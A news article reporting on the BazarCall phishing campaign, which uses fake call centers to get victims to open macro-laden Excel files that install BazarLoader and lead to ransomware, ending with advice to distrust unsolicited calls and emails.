As ransomware attacks have become more sophisticated, Microsoft cybersecurity researchers are now on the hunt for BazarCall, cybercriminal call centers that manage to spread BazarLoader malware, according to ZDNet.
BacarCall, also known as Bazacall, is a cybercriminal gang that has been active since January this year. Their way of tricking victims is different from other cybercrime groups as they use call center operators to do so. The attack typically starts with phishing e-mails telling the victim that a subscription has expired and that a monthly fee is charged automatically unless a number is called to cancel the trial subscription.
Brad Duncan from Palo Alto Networks explained the gang’s attack method in a blog post: “After a client is infected, criminals use this backdoor access to send follow-up malware, scan the environment and exploit other vulnerable hosts on the network”.
The example below is an email from a fake tech company claiming that the victim has downloaded a demo version that will expire within 24 hours and that the software is charged.
We’re tracking an active BazaCall malware campaign leading to human-operated attacks and ransomware deployment. BazaCall campaigns use emails that lure recipients to call a number to cancel their supposed subscription to a certain service. pic.twitter.com/RS5wGSndhv
— Microsoft Security Intelligence (@MsftSecIntel) June 22, 2021
How does the phishing email look like?
Microsoft’s security team explains the steps of the ransomware scam “When recipients call the number, a fraudulent call center operated by the attackers instruct them to visit a website and download an Excel file in order to cancel the service. The Excel file contains a malicious macro that downloads the payload”.
BazarCall also exploits the Active Directory database (AD) using the penetration test kit Cobalt Strike to steal credentials. This tool is also commonly used to access deeper parts of a network after an initial successful attack and hence, can spread to other computers connected in the network.
The bottom line is that you should be wary of unsolicited emails or phone calls asking to access links, download apps or provide personal information. In an overwhelming amount of cases, they are obviously not legit.